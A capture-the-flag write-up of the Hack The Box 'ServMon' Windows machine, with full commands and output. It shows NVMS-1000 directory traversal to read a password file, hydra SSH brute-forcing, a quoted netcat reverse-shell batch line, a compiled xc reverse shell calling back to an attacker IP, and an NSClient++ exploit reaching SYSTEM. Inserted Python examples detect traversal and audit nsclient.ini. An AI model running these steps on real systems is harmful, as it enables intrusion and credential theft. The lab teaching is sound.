
nihilist - 30 / 05 / 2021

ServMon Writeup

Introduction :



ServMon is an easy Windows box released back in April 2020.

Part 1 : Initial Enumeration



As always, we begin our enumeration with Nmap to find open ports, using -sC for the default scripts and -sV to identify service versions.


[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ nmap -sCV 10.10.10.184
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 17:22 CEST
Nmap scan report for 10.10.10.184
Host is up (0.053s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
5666/tcp open  tcpwrapped
8443/tcp open  ssl/https-alt
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-time: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 911.51 seconds
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ nmap -sCV -p21 10.10.10.184
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 17:43 CEST
Nmap scan report for 10.10.10.184
Host is up (0.12s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM                 Users
| ftp-syst:
|_  SYST: Windows_NT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds

Part 2 : Getting User Access



Our nmap scan picked up port 21 ftp with anonymous login allowed, so let's examine it:


[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ wget -r ftp://anonymous:anonymous@10.10.10.184/

[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ tree
.
└── 10.10.10.184
    └── Users
        ├── Nadine
        │   └── Confidential.txt
        └── Nathan
            └── Notes to do.txt

After recursively downloading everything on the FTP share, we have two potential usernames (Nadine and Nathan) and two text files:


[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ cat 10.10.10.184/Users/Nadine/Confidential.txt
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ cat 10.10.10.184/Users/Nathan/Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Our nmap scan also picked up port 80:

The site is running NVMS-1000, so let's check whether any known exploits exist for it:


[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ searchsploit NVMS
------------------------------------------ ---------------------------------
 Exploit Title                            |  Path
------------------------------------------ ---------------------------------
NVMS 1000 - Directory Traversal           | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbi | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal       | hardware/webapps/48311.py
------------------------------------------ ---------------------------------

[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ cat $(locate 47774.txt)
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

NVMS-1000 appears to be vulnerable to directory traversal, so let's test it:


[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ curl http://10.10.10.184/../../../../../../../../../../../../windows/win.ini

[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ curl http://10.10.10.184/../../../../../../../../../../../../windows/win.ini --path-as-is
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

The first request returned nothing because curl normalises the ../ segments out of the path before sending it; with --path-as-is the path is sent literally and the traversal works. Following the note we found earlier, let's use the same traversal to read Passwords.txt:


[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ curl http://10.10.10.184/../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt --path-as-is
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$%

[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ curl http://10.10.10.184/../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt --path-as-is > passwords.txt
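As an added illustration (not the writeup's or NVMS's code), here is the kind of server-side path check NVMS-1000 lacks, together with a detector for the request pattern used above; WEB_ROOT and the log lines are constructed for the example.

```python
"""Added example: traversal-safe path resolution plus access-log detection.
WEB_ROOT and SAMPLE_LOG are constructed; nothing here is the real NVMS code."""
import re
from pathlib import PurePosixPath
from urllib.parse import unquote

WEB_ROOT = PurePosixPath("/srv/nvms/www")   # constructed; not the real install path

# '..' or its percent-encoded form, followed by a separator or more encoding
TRAVERSAL_RE = re.compile(r"(\.\.|%2e%2e)[/\\%]", re.IGNORECASE)

# Combined-log-format line: client, timestamp, "METHOD PATH PROTO", status
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def safe_resolve(request_path, root=WEB_ROOT):
    """Map a URL path onto the web root, or return None if it must be refused.

    The server, not the client, has to neutralise '..': curl only dropped the
    segments above because it normalises URLs, and --path-as-is showed how
    easily that is undone. Percent-encoding and backslashes are unified first
    so that '%2e%2e\\' is judged the same way as '../'.
    """
    decoded = unquote(request_path)
    if "\x00" in decoded:                       # NUL can truncate C-style paths
        return None
    parts = [p for p in decoded.replace("\\", "/").split("/") if p not in ("", ".")]
    for part in parts:
        # Any climb attempt, or an absolute drive-letter path, is rejected outright.
        if part == ".." or re.fullmatch(r"[A-Za-z]:", part):
            return None
    return root.joinpath(*parts)


def flag_traversal_requests(log_lines):
    """Return (client, path, status) for each access-log line with a traversal pattern."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and TRAVERSAL_RE.search(m.group(3)):
            hits.append((m.group(1), m.group(3), int(m.group(4))))
    return hits


# Constructed log lines modelled on the requests made in this writeup.
SAMPLE_LOG = [
    '10.10.14.13 - - [29/May/2021:17:55:01 +0200] "GET /index.html HTTP/1.1" 200 512',
    '10.10.14.13 - - [29/May/2021:17:56:12 +0200] '
    '"GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1" 200 92',
    '10.10.14.13 - - [29/May/2021:17:57:40 +0200] '
    '"GET /%2e%2e/%2e%2e/users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 160',
]

if __name__ == "__main__":
    for req in ("/index.html", "/../../../../windows/win.ini"):
        print(req, "->", safe_resolve(req))
    for client, path, status in flag_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt from {client}: {path} (status {status})")
```

A 200 status on a flagged line is the signal to act on: the server answered a request that should never have been served.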

Now that we have two usernames from the FTP share and a password list, we can use hydra to try the combinations against SSH:


[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ hydra -L users.txt -P passwords.txt ssh://10.10.10.184
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-29 19:23:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 14 tasks per 1 server, overall 14 tasks, 14 login tries (l:2/p:7), ~1 try per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-29 19:24:01

So let's SSH as the nadine user:


[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ ssh nadine@10.10.10.184
The authenticity of host '10.10.10.184 (10.10.10.184)' can't be established.
ECDSA key fingerprint is SHA256:l00hI7FlitUwW9ndgFDHLzImSDNxQcjLOKxQPRmbzls.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.184' (ECDSA) to the list of known hosts.
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>dir
 Volume in drive C has no label.
 Volume Serial Number is DC93-6115

 Directory of C:\Users\Nadine

08/04/2020  23:16    <DIR>          .
08/04/2020  23:16    <DIR>          ..
18/01/2020  11:23    <DIR>          3D Objects
18/01/2020  11:23    <DIR>          Contacts
08/04/2020  22:28    <DIR>          Desktop
08/04/2020  22:28    <DIR>          Documents
18/01/2020  11:23    <DIR>          Downloads
08/04/2020  22:27    <DIR>          Favorites
08/04/2020  22:27    <DIR>          Links
18/01/2020  11:23    <DIR>          Music
18/01/2020  11:31    <DIR>          OneDrive
18/01/2020  11:23    <DIR>          Pictures
18/01/2020  11:23    <DIR>          Saved Games
18/01/2020  11:23    <DIR>          Searches
18/01/2020  11:23    <DIR>          Videos
               0 File(s)              0 bytes
              15 Dir(s)   6,097,006,592 bytes free

nadine@SERVMON C:\Users\Nadine>type Desktop/user.txt
The syntax of the command is incorrect.

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is DC93-6115

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .
08/04/2020  22:28    <DIR>          ..
29/05/2021  16:31                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   6,097,006,592 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
dbXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it! We managed to get the user flag.

Part 3 : Getting Root Access



In order to get root access, we're going to enumerate the box with WinPEAS:


[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ locate winPEAS.bat
/home/nothing/Tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASbat/winPEAS.bat

[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASbat/winPEAS.bat .

[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...

nadine@SERVMON C:\Users\Nadine\Desktop>curl "http://10.10.14.13:9090/winPEAS.bat"  --output peas.bat
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 35761  100 35761    0     0  35761      0  0:00:01 --:--:--  0:00:01  247k

nadine@SERVMON C:\Users\Nadine\Desktop>cmd /c peas.bat

Looking through the winPEAS output for anything interesting, we stumble upon NSClient++:

So let's look for available exploits:


[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ searchsploit nsclient++
----------------------------------------- ---------------------------------
 Exploit Title                           |  Path
----------------------------------------- ---------------------------------
NSClient++ 0.5.2.35 - Authenticated Remo | json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalati | windows/local/46802.txt
----------------------------------------- ---------------------------------
Shellcodes: No Results

Here we want the Privilege Escalation one:


[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ cat $(locate 46802.txt)

[...]

Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
        C:\Program Files\NSClient++>nscp web -- password --display
        Current password: SoSecret

2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

3. Download nc.exe and evil.bat to c:\temp from attacking machine
        @echo off
        c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe

4. Setup listener on attacking machine
        nc -nlvvp 443

5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
        - foobar
                command = c:\temp\evil.bat

6. Add schedulede to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
        - foobar
                interval = 1m
                command = foobar

7. Restart the computer and wait for the reverse shell on attacking machine
        nc -nlvvp 443
        listening on [any] 443 ...
        connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
        Microsoft Windows [Version 10.0.17134.753]
        (c) 2018 Microsoft Corporation. All rights reserved.

        C:\Program Files\NSClient++>whoami
        whoami
        nt authority\system

We could follow these steps by hand, but it is preferable to use the other script (48360.py), which automates them. Either way the first step is the same, so let's grab the web administrator password:


nadine@SERVMON C:\Users\Nadine\Desktop>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\Nadine\Desktop> type "c:\program files\nsclient++\nsclient.ini" | findstr password
password = ew2x6SsGTxjRwXOT

Next we want to visit port 8443, which our nmap scan identified as NSClient++. However, browsing to https://10.10.10.184:8443 will not let us log in, because the config file only allows connections from localhost:


PS C:\Users\Nadine\Desktop> type "c:\program files\nsclient++\nsclient.ini" | findstr 127
allowed hosts = 127.0.0.1
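The two settings above are exactly the ones a defender should be auditing. As an added example (not part of the writeup or of NSClient++ itself), here is a small nsclient.ini check that reports the conditions this escalation relies on; the sample ini is constructed around the two lines pulled out of the real file with findstr, and its section and key names follow NSClient++'s own ini layout.

```python
"""Added example: audit an nsclient.ini body for the weak settings seen on
ServMon. SAMPLE_INI is constructed; only the two findstr'd lines come from the box."""
import configparser

# Constructed to match what the writeup found on the box.
SAMPLE_INI = """\
[/modules]
WEBServer = enabled
CheckExternalScripts = enabled
Scheduler = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = ew2x6SsGTxjRwXOT

[/settings/WEB/server]
port = 8443
"""

# The same file with the scheduler off and no cleartext web password in it.
HARDENED_INI = (SAMPLE_INI
                .replace("Scheduler = enabled", "Scheduler = disabled")
                .replace("password = ew2x6SsGTxjRwXOT", "password ="))


def audit_nsclient_ini(text):
    """Return a list of human-readable findings for an nsclient.ini body."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str          # module names are case-sensitive; keep them as written
    cp.read_string(text)
    findings = []
    default = cp["/settings/default"] if cp.has_section("/settings/default") else {}
    if default.get("password", "").strip():
        findings.append("web password stored in cleartext: anyone who can read "
                        "nsclient.ini (as nadine could) gets admin on the UI; "
                        "restrict the file's ACL to administrators")
    if default.get("allowed hosts", "").strip() in ("127.0.0.1", "localhost", "::1"):
        findings.append("allowed hosts is loopback only: this does not protect "
                        "against a local user who forwards port 8443 over SSH")
    modules = cp["/modules"] if cp.has_section("/modules") else {}
    enabled = [m for m in ("CheckExternalScripts", "Scheduler")
               if modules.get(m, "disabled").strip().lower() == "enabled"]
    if len(enabled) == 2:
        findings.append("CheckExternalScripts and Scheduler both enabled: any "
                        "admin-defined external script runs as SYSTEM on a timer")
    return findings


if __name__ == "__main__":
    for label, body in (("as found", SAMPLE_INI), ("hardened", HARDENED_INI)):
        print(f"== {label} ==")
        for finding in audit_nsclient_ini(body):
            print(" -", finding)
```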

So we're going to open an SSH tunnel to the host to reach its localhost interface:


[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
nadine@10.10.10.184's password: L1k3B1gBut7s@W0rk

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>

With the SSH tunnel in place, we can visit the site as if from the box's own localhost by going to https://127.0.0.1:8443 and logging in with the ew2x6SsGTxjRwXOT password we found earlier:

Once logged in, we need to make sure we can get a binary onto the box that will give us a reverse shell. As I have discovered, HTB does not care about its older retired boxes and does not update or fix them when a problem like this happens:

Literally every other writeup of this machine uses netcat (x86 or x64 versions), yet it does not work on this box. We therefore need a binary that replicates what netcat does while bypassing whatever is preventing us from getting a reverse shell (privileged or not). We could hypothesize that the box has flagged several of our netcat binaries, but we can't know for sure. To do so we're going to use xc, a Go version of netcat written by xct:


[ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
→ sudo apt install golang-go

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
→ git clone https://github.com/xct/xc ; cd xc

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
→ go version
go version go1.15.9 linux/amd64

We need Go 1.15+ to compile the xc binary; with that installed and the repository cloned, we follow the setup steps from the README.md:


[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ go get golang.org/x/sys/...

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ go get golang.org/x/text/encoding/unicode

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ go get github.com/hashicorp/yamux

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ go get github.com/ropnop/go-clr
package github.com/ropnop/go-clr: build constraints exclude all Go files in /home/nothing/go/src/github.com/ropnop/go-clr

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ pip3 install donut-shellcode
Collecting donut-shellcode
  Downloading donut-shellcode-0.9.2.tar.gz (149 kB)
     |████████████████████████████████| 149 kB 2.0 MB/s
Building wheels for collected packages: donut-shellcode
  Building wheel for donut-shellcode (setup.py) ... done
  Created wheel for donut-shellcode: filename=donut_shellcode-0.9.2-cp39-cp39-linux_x86_64.whl size=56786 sha256=0e6037e945da6f8496c98bdb849a13ca84339af1ef50166a7480d6477d9729b8
  Stored in directory: /home/nothing/.cache/pip/wheels/ac/72/45/1a77c4737812b5635cd958224c0ff623ebcef62c15ef083bab
Successfully built donut-shellcode
Installing collected packages: donut-shellcode
Successfully installed donut-shellcode-0.9.2

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ sudo apt install rlwrap upx -y

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ make


[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ ls -lash | grep xc
1.3M -rwxr-xr-x  1 nothing nothing 1.3M May 30 14:03 xc
3.2M -rwxr-xr-x  1 nothing nothing 3.2M May 30 14:03 xc.exe
4.0K -rw-r--r--  1 nothing nothing 2.7K May 30 14:03 xc.go

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ file xc xc.exe xc.go
xc:     ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), statically linked, no section header
xc.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
xc.go:  C source, ASCII text

Now that xc is compiled for both Linux and Windows, let's test the Linux version:

It works locally, so let's test the Windows version of xc on the box:


[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ python3 -m http.server 9090

PS C:\Users\Nadine> wget http://10.10.14.13:9090/xc/xc.exe -o c:\temp\xc.exe

PS C:\Users\Nadine> cd c:\temp

PS C:\temp> ./xc.exe 10.10.14.13 9001
2021/05/30 13:59:45 Connected to 10.10.14.13:9001

[ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc]
→ ./xc -l -p 9001

                __  _____
                \ \/ / __|
                >  < (__
                /_/\_\___| by @xct_de
                           build: QUnVVFdLYEkibcKx

2021/05/30 14:51:44 Listening on :9001
2021/05/30 14:51:44 Waiting for connections...
2021/05/30 14:52:08 Connection from 10.10.10.184:56967
2021/05/30 14:52:08 Stream established

[*] Auto-Plugins:
[xc: C:\temp]: !shell
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\temp>whoami
whoami
servmon\nadine

And we have a reverse shell! It's only as the nadine user though, so let's get a privileged one with the privesc exploit:


PS C:\temp> wget http://10.10.14.13:9090/xc/xc.exe -o c:\temp\xc.exe

[ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc]
→ ./xc -l -p 9001

[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ python3 48360.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c "C:\Temp\xc.exe 10.10.14.13 9001"

[ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc]
→ ./xc -l -p 9001

                __  _____
                \ \/ / __|
                >  < (__
                /_/\_\___| by @xct_de
                           build: QUnVVFdLYEkibcKx

2021/05/30 15:02:41 Listening on :9001
2021/05/30 15:02:41 Waiting for connections...
2021/05/30 15:03:08 Connection from 10.10.10.184:57375
2021/05/30 15:03:08 Stream established

[*] Auto-Plugins:
[xc: C:\Program Files\NSClient++]: !shell
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

C:\Program Files\NSClient++>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
d8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it! We managed to get the root flag.

Conclusion



Here we can see the progress graph: